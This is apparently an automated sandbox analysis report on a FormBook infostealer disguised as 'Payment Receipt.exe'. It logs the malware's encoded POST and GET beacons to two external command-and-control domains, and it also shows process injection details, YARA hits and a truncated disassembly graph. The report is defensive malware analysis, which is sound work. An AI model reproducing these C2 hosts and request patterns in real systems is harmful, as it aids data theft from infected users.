                                                                    Data Raw: 31 56 3d 56 52 4b 41 78 43 58 56 37 43 52 57 4a 53 30 42 43 45 57 58 55 50 59 65 55 33 75 54 39 6d 6b 58 53 66 64 4a 69 6f 7a 6d 77 74 59 6f 58 76 6b 36 6a 4f 54 66 73 73 72 77 4e 52 68 6f 41 52 77 65 2b 4b 47 38 64 43 48 42 2f 78 36 75 48 41 52 6a 36 75 68 47 52 31 49 39 6c 51 64 39 76 31 69 5a 57 70 76 73 78 30 72 4f 77 38 2f 44 65 56 4c 35 48 51 6f 76 4d 56 78 6f 53 31 57 30 33 79 75 43 39 74 76 30 67 2f 58 61 2f 51 6d 41 57 57 78 38 4d 6e 44 67 6e 71 5a 75 36 33 2f 63 59 48 71 6f 4e 6f 57 45 35 2f 6a 70 65 4d 52 36 70 74 54 78 6a 48 4f 34 5a 56 49 62 54 74 79 44 57 32 67 68 65 6f 55 77 6b 30 64 36 65 68 47 65 46 58 63 45 73 70 6f 76 50 56 4d 3d
                                                                    Data Ascii: 1V=VRKAxCXV7CRWJS0BCEWXUPYeU3uT9mkXSfdJiozmwtYoXvk6jOTfssrwNRhoARwe+KG8dCHB/x6uHARj6uhGR1I9lQd9v1iZWpvsx0rOw8/DeVL5HQovMVxoS1W03yuC9tv0g/Xa/QmAWWx8MnDgnqZu63/cYHqoNoWE5/jpeMR6ptTxjHO4ZVIbTtyDW2gheoUwk0d6ehGeFXcEspovPVM=
                                                                    Jan 3, 2025 11:42:26.620829105 CET370INHTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 03 Jan 2025 10:42:26 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.sonixingenuine.shop/01c7/
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    43192.168.2.45004513.228.81.39801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:42:28.224823952 CET10854OUTPOST /01c7/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.sonixingenuine.shop
                                                                    Origin: http://www.sonixingenuine.shop
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.sonixingenuine.shop/01c7/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 56 52 4b 41 78 43 58 56 37 43 52 57 4a 53 30 42 43 45 57 58 55 50 59 65 55 33 75 54 39 6d 6b 58 53 66 64 4a 69 6f 7a 6d 77 74 51 6f 57 61 77 36 73 4a 6e 66 76 73 72 77 54 42 68 6c 41 52 78 43 2b 4b 65 34 64 43 43 32 2f 7a 43 75 49 44 5a 6a 7a 2f 68 47 47 46 49 39 71 77 64 2b 72 31 69 32 57 70 66 6f 78 77 50 4f 77 38 2f 44 65 58 6a 35 58 30 38 76 4b 56 78 6e 56 31 57 6f 67 69 75 36 39 70 44 4b 67 2f 44 4b 34 6a 2b 41 57 32 68 38 4f 79 58 67 72 71 5a 73 39 33 2f 45 59 48 57 4e 4e 73 2b 32 35 2f 58 44 65 4f 4e 36 6f 62 36 6f 33 32 4f 6e 4c 6a 45 66 4d 4f 61 38 50 31 41 63 54 70 51 52 6f 6d 68 46 43 43 58 31 41 30 35 64 34 49 46 76 4d 79 34 7a 64 45 50 4c 36 66 62 44 78 6b 71 51 57 6f 76 4d 37 34 6c 50 6c 36 4b 2b 6a 61 41 57 35 44 71 66 68 66 73 32 74 46 34 66 72 30 5a 68 5a 41 66 47 4c 63 52 36 2b 63 79 71 68 56 70 46 76 76 51 68 6c 36 36 36 59 4b 36 59 51 72 54 35 41 4d 4f 77 62 43 6f 79 34 35 46 78 5a 4b 6a 48 64 31 38 47 53 58 78 7a 4e 6d 30 44 7a 48 5a 34 55 61 70 59 4c 46 78 34 6f 41 48 [TRUNCATED]
                                                                    Data Ascii: 1V=VRKAxCXV7CRWJS0BCEWXUPYeU3uT9mkXSfdJiozmwtQoWaw6sJnfvsrwTBhlARxC+Ke4dCC2/zCuIDZjz/hGGFI9qwd+r1i2WpfoxwPOw8/DeXj5X08vKVxnV1Wogiu69pDKg/DK4j+AW2h8OyXgrqZs93/EYHWNNs+25/XDeON6ob6o32OnLjEfMOa8P1AcTpQRomhFCCX1A05d4IFvMy4zdEPL6fbDxkqQWovM74lPl6K+jaAW5Dqfhfs2tF4fr0ZhZAfGLcR6+cyqhVpFvvQhl666YK6YQrT5AMOwbCoy45FxZKjHd18GSXxzNm0DzHZ4UapYLFx4oAHxZqMxvYJz4fT5sKHrqkkZba4ZFLWdW5ZV1AQUs1qrJylU3tAJuULtdkyCV5zCI9mZQqOjndso64pCqMFXRLfJrL3Pd9ZAVeiwtJ85I2nQQfdy3iflW/z6R1x5IXtRN+sBigCein5mnZmcF+s9b47cffpB0GWc76YzGCzWVbR1KFsLgiik66fSTF4eXimAE4KzJx8RPgkVSzdpKWuNoJVfXqSsFsoTqWJ9uASQwOsiJISycLHQPwfHeNl68hLc6pQphVONoT2cZG+glH1dxCb45q5EyG9H8rLO/29T2OV24dTnRYOzKn5kcn4iPBpMjAiFzRglOwwjr6/yMrGPq6DOljTtrrsNd12N1cQUDf06e3XqXaEM4t234KwflPlzCbBZs7ukL8ggiDx08xG9bhsAt4tgJxuHpWPV3q6HNvh2uQsVTPfR2DaHXlOduAng4YnUmD0YRV/ZZiSHmw2zPJjwvGaR8bFHTAPsKTyqGORyLPLc4UcBJbQZxRiFkfAgXdQFcQRdJtZDuRHXqN08aKYmRQ1pGBmjvCVGvktcKNBbXRt+0uh3LjdTGQhWz6VvvgejnWPRwG9Y6+M5z68CUc5aUNVzEgoLt7ArRcpEmTl+WI01WIlNnXKNPXZOPx7eTLLPMu3EUb2BxvDcVz+xA9Foh3wzUug9dwgYb [TRUNCATED]
                                                                    Jan 3, 2025 11:42:29.147861004 CET370INHTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 03 Jan 2025 10:42:28 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.sonixingenuine.shop/01c7/
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    44192.168.2.45004613.228.81.39801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:42:30.764127970 CET474OUTGET /01c7/?1V=YTigy0/11EA1EDEWI2qwNPkZTl2Ew25ueN49sLqr1toXUas0k4bLkY/pThMrKnph3bjNfCydzgD9Nz90+/wReHsi0Sd5n3+/SqbRiWTP8J7rQ0imHyBBNkU=&w0DDw=KH0hz6 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.sonixingenuine.shop
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:42:31.691340923 CET507INHTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 03 Jan 2025 10:42:31 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.sonixingenuine.shop/01c7/?1V=YTigy0/11EA1EDEWI2qwNPkZTl2Ew25ueN49sLqr1toXUas0k4bLkY/pThMrKnph3bjNfCydzgD9Nz90+/wReHsi0Sd5n3+/SqbRiWTP8J7rQ0imHyBBNkU=&w0DDw=KH0hz6
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    45192.168.2.450047154.39.239.237801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:42:37.250813007 CET725OUTPOST /b9e2/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.moyu19.pro
                                                                    Origin: http://www.moyu19.pro
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.moyu19.pro/b9e2/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 48 56 69 47 6d 71 56 48 48 7a 54 7a 6c 39 7a 43 6d 64 68 6e 48 69 4c 4f 38 51 6b 68 43 71 38 4f 34 5a 49 4a 75 78 48 39 56 30 32 48 67 65 31 39 51 47 45 44 43 62 46 43 30 64 57 33 33 5a 50 49 6e 6e 74 39 65 65 42 43 34 42 35 75 5a 4f 79 53 78 39 46 70 57 75 41 4a 30 76 55 78 30 2b 79 43 79 31 52 2b 56 53 68 4a 59 44 67 77 70 33 73 34 71 38 4e 50 6a 6a 49 7a 30 4e 62 36 65 31 7a 2f 70 61 41 7a 57 7a 34 39 59 75 6d 34 73 37 72 71 32 44 5a 70 2f 72 41 63 44 55 63 50 41 42 63 42 7a 4b 4e 46 72 36 2b 56 38 70 77 30 57 4b 53 6f 57 4b 79 57 79 65 41 49 56 39 51 6a 46 52 2b 51 31 77 3d 3d
                                                                    Data Ascii: 1V=HViGmqVHHzTzl9zCmdhnHiLO8QkhCq8O4ZIJuxH9V02Hge19QGEDCbFC0dW33ZPInnt9eeBC4B5uZOySx9FpWuAJ0vUx0+yCy1R+VShJYDgwp3s4q8NPjjIz0Nb6e1z/paAzWz49Yum4s7rq2DZp/rAcDUcPABcBzKNFr6+V8pw0WKSoWKyWyeAIV9QjFR+Q1w==


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    46192.168.2.450048154.39.239.237801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:42:39.854240894 CET745OUTPOST /b9e2/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.moyu19.pro
                                                                    Origin: http://www.moyu19.pro
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.moyu19.pro/b9e2/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 48 56 69 47 6d 71 56 48 48 7a 54 7a 6a 74 44 43 6b 2b 35 6e 46 43 4b 38 35 51 6b 68 5a 36 38 4b 34 5a 45 4a 75 30 6e 74 56 6d 43 48 67 2f 46 39 43 55 67 44 48 62 46 43 2f 39 57 79 34 35 4f 47 6e 6e 78 31 65 63 56 43 34 42 74 75 5a 4c 4f 53 77 4d 46 71 56 65 41 78 38 50 55 7a 36 65 79 43 79 31 52 2b 56 53 63 73 59 44 6f 77 70 47 63 34 37 75 31 4d 38 54 49 30 67 64 62 36 61 31 7a 6a 70 61 41 46 57 33 34 58 59 74 4f 34 73 37 37 71 33 53 5a 6d 32 72 41 61 65 6b 63 52 50 6a 39 4a 36 70 77 45 75 4d 69 4b 32 59 77 73 65 73 66 79 48 37 54 42 67 65 6b 37 49 36 5a 58 49 53 44 5a 75 37 4b 78 71 67 48 67 53 4d 7a 31 30 4a 70 48 59 32 44 4f 33 4a 6b 3d
                                                                    Data Ascii: 1V=HViGmqVHHzTzjtDCk+5nFCK85QkhZ68K4ZEJu0ntVmCHg/F9CUgDHbFC/9Wy45OGnnx1ecVC4BtuZLOSwMFqVeAx8PUz6eyCy1R+VScsYDowpGc47u1M8TI0gdb6a1zjpaAFW34XYtO4s77q3SZm2rAaekcRPj9J6pwEuMiK2YwsesfyH7TBgek7I6ZXISDZu7KxqgHgSMz10JpHY2DO3Jk=


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    47192.168.2.450049154.39.239.237801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:42:42.433321953 CET10827OUTPOST /b9e2/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.moyu19.pro
                                                                    Origin: http://www.moyu19.pro
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.moyu19.pro/b9e2/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 48 56 69 47 6d 71 56 48 48 7a 54 7a 6a 74 44 43 6b 2b 35 6e 46 43 4b 38 35 51 6b 68 5a 36 38 4b 34 5a 45 4a 75 30 6e 74 56 6d 61 48 67 4e 4e 39 51 6b 63 44 41 62 46 43 6b 64 57 7a 34 35 50 61 6e 6e 35 50 65 63 5a 34 34 43 56 75 57 4a 32 53 68 49 52 71 43 4f 41 78 2b 50 55 79 30 2b 79 54 79 30 67 35 56 53 73 73 59 44 6f 77 70 46 30 34 37 38 4e 4d 36 54 49 7a 30 4e 61 75 65 31 7a 66 70 61 34 37 57 33 73 74 5a 64 75 34 73 61 4c 71 31 6b 4e 6d 75 37 41 59 64 6b 64 43 50 6a 78 47 36 70 38 79 75 4d 2b 73 32 59 45 73 63 5a 69 4e 44 4c 48 4c 79 2f 45 71 57 4a 78 49 50 52 2f 75 31 36 66 4b 6a 67 2f 6a 4e 4d 6e 47 2f 75 4a 4b 42 31 61 4d 73 4d 54 46 4a 67 71 49 4b 69 6e 58 76 49 66 6f 4c 51 59 6c 53 6a 35 5a 4d 53 53 4a 58 2f 6e 44 31 57 73 78 66 6d 74 55 48 77 35 43 2f 5a 63 71 42 4f 4a 54 38 6a 62 65 68 51 72 48 48 2f 6a 57 66 64 66 68 65 78 36 55 78 41 2b 37 6a 31 4a 66 2b 77 6d 6c 70 49 69 69 58 66 6b 4f 6f 42 4e 6a 53 56 79 4e 67 55 6d 48 34 36 65 51 52 2f 63 4f 69 6b 56 41 4a 63 71 69 74 75 74 [TRUNCATED]
                                                                    Data Ascii: 1V=HViGmqVHHzTzjtDCk+5nFCK85QkhZ68K4ZEJu0ntVmaHgNN9QkcDAbFCkdWz45Pann5PecZ44CVuWJ2ShIRqCOAx+PUy0+yTy0g5VSssYDowpF0478NM6TIz0Naue1zfpa47W3stZdu4saLq1kNmu7AYdkdCPjxG6p8yuM+s2YEscZiNDLHLy/EqWJxIPR/u16fKjg/jNMnG/uJKB1aMsMTFJgqIKinXvIfoLQYlSj5ZMSSJX/nD1WsxfmtUHw5C/ZcqBOJT8jbehQrHH/jWfdfhex6UxA+7j1Jf+wmlpIiiXfkOoBNjSVyNgUmH46eQR/cOikVAJcqitutH9eqg3Sk30t6rvaIr8EDYHwMRu7K2bBDT6H3RQfbdLIkeKYAqeAYlT+9XEcKrzl1N3RNydwWCTOC6D2KYvHcVkOqsu50aKVeGHXzKDq/F4+CMzL9Mi2P4HHJhFvZgTA9BnCebOmQkZEMUCHRBh3aKJ23o6W7I9NI7S0YUOnejJgBiTnnxboiGHqMimBr9SlU7VW6cR/bC7GR4X9zu8syXTLhuG7wyeREEtnG3TSJWsbGkvPhVEKalMYTkvV+9IPmdgRhu1UIh4cGtEonZc/cQABGHTC9Gojwm4GK3yDrRP5P+wPh/okwWJOxS3PeYQYM73+gLMt+ewfCZp+TSYTPoH7iwszcJhn3bUFJaq8MzP7uV1ZJJwdq3FBs3dl9/h6ihtPLKMFNItxfl9Ez7hiJaYLFsPCz8HUz3rP5Lv4ZDeWCR2aQ3w4sdkGw+O4OnoPX9Gqlhq/FJUn89qYZOKs5sVW/GwSFW1PhT+m1ooyODixfLZ5kahpPWKb2nt5syB3rE95t/WyfoK3rdBEJ9qJB/x+Gk9qpy1KoeZ+2t7ey9hLSGwN3zXP3iKtvpZ4hzdrsku6aXSH5BsvVFlPoqgEjBVV5QpUdQDdzmVUgtWvCiZsx3/wKAVhGJdqtTp9GPC3CEEG7Hh2x94QM6S/8J9VMzVQOU3DKPuQ4PV [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    48192.168.2.450050154.39.239.237801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:42:44.984601021 CET465OUTGET /b9e2/?1V=KXKmlftrGUnNwN71qtFvViHh9QQKT49uyIFWo1edE1ybkp1zCkMUBe9/9dTIwO/9znAhfptP/ghbc5af4f99NMc1rtl+75eG21JCXkgtBEctrkJEqfktzAA=&w0DDw=KH0hz6 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.moyu19.pro
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:05:38:52
                                                                    Start date:03/01/2025
                                                                    Path:C:\Users\user\Desktop\Payment Receipt.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\Payment Receipt.exe"
                                                                    Imagebase:0x730000
                                                                    File size:289'280 bytes
                                                                    MD5 hash:E6BD9E9D02F848789769EDCF7023E15C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2016587494.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2016901263.0000000002480000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:4
                                                                    Start time:05:39:22
                                                                    Start date:03/01/2025
                                                                    Path:C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe"
                                                                    Imagebase:0x3c0000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4097999187.0000000003030000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:5
                                                                    Start time:05:39:23
                                                                    Start date:03/01/2025
                                                                    Path:C:\Windows\SysWOW64\fc.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\fc.exe"
                                                                    Imagebase:0x960000
                                                                    File size:22'528 bytes
                                                                    MD5 hash:4D5F86B337D0D099E18B14F1428AAEFF
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4097035326.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4098003427.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4097327937.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:6
                                                                    Start time:05:39:36
                                                                    Start date:03/01/2025
                                                                    Path:C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe"
                                                                    Imagebase:0x3c0000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:7
                                                                    Start time:05:39:48
                                                                    Start date:03/01/2025
                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                    Imagebase:0x7ff6bf500000
                                                                    File size:676'768 bytes
                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:1.2%
                                                                      Dynamic/Decrypted Code Coverage:5.2%
                                                                      Signature Coverage:15.6%
                                                                      Total number of Nodes:135
                                                                      Total number of Limit Nodes:9
                                                                      execution_graph 92349 754e13 92350 754e2f 92349->92350 92351 754e57 92350->92351 92352 754e6b 92350->92352 92353 75cb43 NtClose 92351->92353 92359 75cb43 92352->92359 92355 754e60 92353->92355 92356 754e74 92362 75ed23 RtlAllocateHeap 92356->92362 92358 754e7f 92360 75cb60 92359->92360 92361 75cb71 NtClose 92360->92361 92361->92356 92362->92358 92373 75c143 92374 75c15d 92373->92374 92377 15e2df0 LdrInitializeThunk 92374->92377 92375 75c185 92377->92375 92378 75fd03 92381 75ec03 92378->92381 92384 75ceb3 92381->92384 92383 75ec1c 92385 75cecd 92384->92385 92386 75cede RtlFreeHeap 92385->92386 92386->92383 92387 7551a3 92388 7551bc 92387->92388 92389 755204 92388->92389 92392 755247 92388->92392 92394 75524c 92388->92394 92390 75ec03 RtlFreeHeap 92389->92390 92391 755214 92390->92391 92393 75ec03 RtlFreeHeap 92392->92393 92393->92394 92395 75fca3 92396 75fcb3 92395->92396 92397 75fcb9 92395->92397 92400 75ece3 92397->92400 92399 75fcdf 92403 75ce63 92400->92403 92402 75ecfe 92402->92399 92404 75ce80 92403->92404 92405 75ce91 RtlAllocateHeap 92404->92405 92405->92402 92363 7444f3 92364 74450d 92363->92364 92369 747ca3 92364->92369 92366 74452b 92367 74455f PostThreadMessageW 92366->92367 92368 744570 92366->92368 92367->92368 92370 747cc7 92369->92370 92371 747cce 92370->92371 92372 747d03 LdrLoadDll 92370->92372 92371->92366 92372->92371 92406 74aa63 92407 74aad5 92406->92407 92408 74aa7b 92406->92408 92408->92407 92410 74e993 92408->92410 92411 74e9b9 92410->92411 92415 74eab0 92411->92415 92416 75fd43 RtlAllocateHeap RtlFreeHeap 92411->92416 92413 74ea4e 92413->92415 92417 75c193 92413->92417 92415->92407 92416->92413 92418 75c1b0 92417->92418 92421 15e2c0a 92418->92421 92419 75c1dc 92419->92415 92422 15e2c1f LdrInitializeThunk 92421->92422 92423 15e2c11 92421->92423 92422->92419 92423->92419 92424 749303 92425 749333 92424->92425 92427 74935f 92425->92427 92428 74b7c3 92425->92428 92430 74b807 92428->92430 92429 74b828 92429->92425 92430->92429 92431 75cb43 NtClose 92430->92431 92431->92429 92432 731beb 92433 731bf9 92432->92433 92436 760173 92433->92436 92439 75e7b3 92436->92439 92440 75e7d9 92439->92440 92451 737583 92440->92451 92442 75e7ef 92450 731d8c 92442->92450 92454 74b5d3 92442->92454 92444 75e80e 92445 75e823 92444->92445 92469 75cf03 92444->92469 92465 7586d3 92445->92465 92448 75e83d 92449 75cf03 ExitProcess 92448->92449 92449->92450 92472 746953 92451->92472 92453 737590 92453->92442 92455 74b5ff 92454->92455 92483 74b4c3 92455->92483 92458 74b644 92461 75cb43 NtClose 92458->92461 92462 74b660 92458->92462 92459 74b62c 92460 75cb43 NtClose 92459->92460 92463 74b637 92459->92463 92460->92463 92464 74b656 92461->92464 92462->92444 92463->92444 92464->92444 92467 758735 92465->92467 92466 758742 92466->92448 92467->92466 92494 